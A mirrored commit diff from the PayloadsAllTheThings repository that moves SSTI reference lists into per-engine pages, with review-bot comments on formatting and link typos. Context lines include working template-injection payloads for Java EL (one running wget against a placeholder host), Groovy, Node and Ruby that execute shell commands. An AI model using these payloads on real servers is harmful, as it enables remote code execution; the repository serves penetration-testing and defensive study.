mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-04 18:40:41 +00:00
SSTI references updates
This commit is contained in:
parent
51fe542992
commit
21dfd91180
9 changed files with 56 additions and 35 deletions
|
@ -5,13 +5,16 @@
|
||||||
- [ASP.NET Razor](#aspnet-razor)
|
- [ASP.NET Razor](#aspnet-razor)
|
||||||
- [ASP.NET Razor - Basic injection](#aspnet-razor---basic-injection)
|
- [ASP.NET Razor - Basic injection](#aspnet-razor---basic-injection)
|
||||||
- [ASP.NET Razor - Command execution](#aspnet-razor---command-execution)
|
- [ASP.NET Razor - Command execution](#aspnet-razor---command-execution)
|
||||||
|
- [References](#references)
|
||||||
|
|
||||||
|
|
||||||
## ASP.NET Razor
|
## ASP.NET Razor
|
||||||
|
|
||||||
[Official website](https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c)
|
[Official website](https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c)
|
||||||
|
|
||||||
> Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.
|
> Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.
|
||||||
|
|
||||||
|
|
||||||
### ASP.NET Razor - Basic injection
|
### ASP.NET Razor - Basic injection
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -25,3 +28,8 @@
|
||||||
// C# code
|
// C# code
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
- [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - April 15, 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
|
|
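Review bot: Style: the new `## References` section here is not preceded by a `---` rule, whereas the Java, JavaScript, PHP and Ruby files touched in this same commit all insert `---` before their `## References` heading; consider adding the rule so the section layout is consistent across the SSTI pages.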
@ -6,6 +6,7 @@
|
||||||
- [Expression Language EL - Basic injection](#expression-language-el---basic-injection)
|
- [Expression Language EL - Basic injection](#expression-language-el---basic-injection)
|
||||||
- [Expression Language EL - One-Liner injections not including code execution](#expression-language-el---one-liner-injections-not-including-code-execution)
|
- [Expression Language EL - One-Liner injections not including code execution](#expression-language-el---one-liner-injections-not-including-code-execution)
|
||||||
- [Expression Language EL - Code Execution](#expression-language-el---code-execution)
|
- [Expression Language EL - Code Execution](#expression-language-el---code-execution)
|
||||||
|
- [References](#references)
|
||||||
|
|
||||||
|
|
||||||
## Expression Language EL
|
## Expression Language EL
|
||||||
|
@ -81,3 +82,14 @@ T(java.lang.Runtime).getRuntime().exec('whoami').x
|
||||||
// Method using ScriptEngineManager
|
// Method using ScriptEngineManager
|
||||||
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}
|
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
- [Bean Stalking: Growing Java beans into RCE - Alvaro Munoz - July 7, 2020](https://securitylab.github.com/research/bean-validation-RCE)
|
||||||
|
- [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Peter M (@pmnh_) - December 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
|
||||||
|
- [Expression Language Injection - OWASP - 2024](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)
|
||||||
|
- [Expression Language injection - PortSwigger - 2024](https://portswigger.net/kb/issues/00100f20_expression-language-injection)
|
||||||
|
- [Leveraging the Spring Expression Language (SpEL) injection vulnerability (a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/)
|
||||||
|
- [RCE in Hubspot with EL injection in HubL - @fyoorer - December 7, 2018](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html)
|
||||||
|
- [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - January 29, 2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
|
|
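Review bot: Same layout point as the ASP.NET file: `## References` is appended without the `---` separator that the other engine files in this commit use before that heading. Otherwise the entries follow the `Title - Author - Date` pattern consistently, and dropping the `?spref=tw` tracking suffix from the HubL URL (present in the removed central list) is the right call.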
@ -27,6 +27,7 @@
|
||||||
- [Groovy - HTTP request:](#groovy---http-request)
|
- [Groovy - HTTP request:](#groovy---http-request)
|
||||||
- [Groovy - Command Execution](#groovy---command-execution)
|
- [Groovy - Command Execution](#groovy---command-execution)
|
||||||
- [Groovy - Sandbox Bypass](#groovy---sandbox-bypass)
|
- [Groovy - Sandbox Bypass](#groovy---sandbox-bypass)
|
||||||
|
- [References](#references)
|
||||||
|
|
||||||
|
|
||||||
## Templating Libraries
|
## Templating Libraries
|
||||||
|
@ -276,4 +277,11 @@ or
|
||||||
${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") }
|
${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") }
|
||||||
```
|
```
|
||||||
|
|
||||||
---
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
- [Server Side Template Injection – on the example of Pebble - Michał Bentkowski - September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
|
||||||
|
- [Server-Side Template Injection: RCE For The Modern Web App - James Kettle @albinowax - December 10, 2015](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
|
||||||
|
- [Server-Side Template Injection: RCE For The Modern Web App (PDF) - James Kettle @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
|
||||||
|
- [Server-Side Template Injection: RCE For The Modern Web App (Video) - James Kettle @albinowax - December 28, 2015](https://www.youtube.com/watch?v=3cT0uE7Y87s)
|
||||||
|
- [VelocityServlet Expression Language injection - MagicBlue - November 15, 2017](https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/)
|
|
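Review bot: The `(PDF)` entry in this hunk has no date, unlike every other entry in the list (and unlike the gist and video entries for the same talk); add the date so the list keeps one format. The gist entry also points at a third-party mirror of James Kettle's write-up rather than the original PortSwigger post; prefer the canonical source where one exists.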
@ -8,7 +8,7 @@
|
||||||
- [Lodash](#Lodash)
|
- [Lodash](#Lodash)
|
||||||
- [Lodash - Basic Injection](#lodash---basic-injection)
|
- [Lodash - Basic Injection](#lodash---basic-injection)
|
||||||
- [Lodash - Command Execution](#lodash---command-execution)
|
- [Lodash - Command Execution](#lodash---command-execution)
|
||||||
|
- [References](#references)
|
||||||
|
|
||||||
## Templating Libraries
|
## Templating Libraries
|
||||||
|
|
||||||
|
@ -104,5 +104,8 @@ ${= _.VERSION}
|
||||||
{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
|
{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
|
||||||
```
|
```
|
||||||
|
|
||||||
---
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
- [Exploiting Less.js to Achieve RCE - Jeremy Buis - July 1, 2021](https://web.archive.org/web/20210706135910/https://www.softwaresecured.com/exploiting-less-js/)
|
||||||
|
- [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
|
|
@ -15,6 +15,7 @@
|
||||||
- [patTemplate](#pattemplate)
|
- [patTemplate](#pattemplate)
|
||||||
- [PHPlib](#phplib-and-html_template_phplib)
|
- [PHPlib](#phplib-and-html_template_phplib)
|
||||||
- [Plates](#plates)
|
- [Plates](#plates)
|
||||||
|
- [References](#references)
|
||||||
|
|
||||||
|
|
||||||
## Templating Libraries
|
## Templating Libraries
|
||||||
|
@ -247,4 +248,7 @@ layout template:
|
||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
|
|
||||||
---
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [TODO](#todo)
|
|
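Review bot: `* [TODO](#todo)` is a placeholder that links to a `#todo` anchor which does not exist, so the TOC entry added in the previous hunk (`- [References](#references)`) now leads to a dead link; either fill the section with actual references or leave the heading out until there are entries. It also uses the `*` bullet style while the other files in this commit use `-`.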
@ -413,4 +413,7 @@ PoC :
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
|
- [Cheatsheet - Flask & Jinja2 SSTI - phosphore - September 3, 2018](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
|
||||||
|
- [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||||
|
- [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/)
|
||||||
|
- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
|
|
@ -83,28 +83,7 @@ Once the template engine is identified, the attacker injects more complex expres
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
- [A Pentester's Guide to Server Side Template Injection (SSTI) - Busra Demir - December 24, 2020](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
|
||||||
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
|
- [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - August 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
|
||||||
* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
|
- [Template Engines Injection 101 - Mahmoud M. Awali - November 1, 2024](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
|
||||||
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
|
- [Template Injection On Hardened Targets - Lucas 'BitK' Philippe - September 28, 2022](https://youtu.be/M0b_KA0OMFw)
|
||||||
* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/)
|
|
||||||
* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
|
|
||||||
* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw)
|
|
||||||
* [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/)
|
|
||||||
* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
|
|
||||||
* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
|
|
||||||
* [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
|
|
||||||
* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
|
|
||||||
* [Expression Language injection - PortSwigger](https://portswigger.net/kb/issues/00100f20_expression-language-injection)
|
|
||||||
* [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE)
|
|
||||||
* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
|
|
||||||
* [Handlebars template injection and RCE in a Shopify app ](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
|
|
||||||
* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)
|
|
||||||
* [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/)
|
|
||||||
* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
|
|
||||||
* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)
|
|
||||||
* [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw)
|
|
||||||
* [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Dec 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
|
|
||||||
* [Leveraging the Spring Expression Language (SpEL) injection vulnerability ( a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/)
|
|
||||||
* [Expression Language Injection - OWASP](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)
|
|
||||||
* [Template Engines Injection 101 - Mahmoud M. Awali - Nov 1, 2024](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
|
|
|
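Review bot: Three entries from the removed central list do not reappear in any of the per-engine hunks shown in this commit: the OWASP Tplmap PDF (Divine Selorm Tsa), the PortSwigger lab "Server-side template injection in an unknown language with a documented exploit", and the "Django Templates Server-Side Template Injection" PDF. If the drop is intentional it should be mentioned in the commit message; otherwise re-home them (the Django PDF belongs in the Python file alongside the Jinja2/Mako entries).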
@ -8,6 +8,7 @@
|
||||||
- [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
|
- [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
|
||||||
- [Ruby - List files and directories](#ruby---list-files-and-directories)
|
- [Ruby - List files and directories](#ruby---list-files-and-directories)
|
||||||
- [Ruby - Remote Command execution](#ruby---remote-Command-execution)
|
- [Ruby - Remote Command execution](#ruby---remote-Command-execution)
|
||||||
|
- [References](#referenecs)
|
||||||
|
|
||||||
|
|
||||||
## Templating Libraries
|
## Templating Libraries
|
||||||
|
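Review bot: Typo in the new TOC entry: `- [References](#referenecs)` should be `#references`, otherwise the link points at a non-existent anchor (the heading added in the next hunk is `## References`).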
@ -70,4 +71,7 @@ Execute code using SSTI for **Slim** engine.
|
||||||
#{ %x|env| }
|
#{ %x|env| }
|
||||||
```
|
```
|
||||||
|
|
||||||
---
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [Ruby ERB Template Injection - Scott White & Geoff Walton - September 13, 2017](https://web.archive.org/web/20181119170413/https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
|
|
@ -62,8 +62,8 @@ markdown_extensions:
|
||||||
- pymdownx.emoji:
|
- pymdownx.emoji:
|
||||||
emoji_index: !!python/name:material.extensions.emoji.twemoji
|
emoji_index: !!python/name:material.extensions.emoji.twemoji
|
||||||
emoji_generator: !!python/name:material.extensions.emoji.to_svg
|
emoji_generator: !!python/name:material.extensions.emoji.to_svg
|
||||||
- mdx_truly_sane_lists:
|
# - mdx_truly_sane_lists:
|
||||||
nested_indent: 2
|
# nested_indent: 2
|
||||||
# truly_sane: True
|
# truly_sane: True
|
||||||
|
|
||||||
plugins:
|
plugins:
|
||||||
|
|
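Review bot: Commenting out `mdx_truly_sane_lists` (and its `nested_indent: 2` setting) changes how nested lists render across the whole generated site, which is outside what the commit message "SSTI references updates" describes; either split this into its own commit or extend the message, and add a comment next to the commented-out block explaining why it is disabled rather than leaving dead configuration in place.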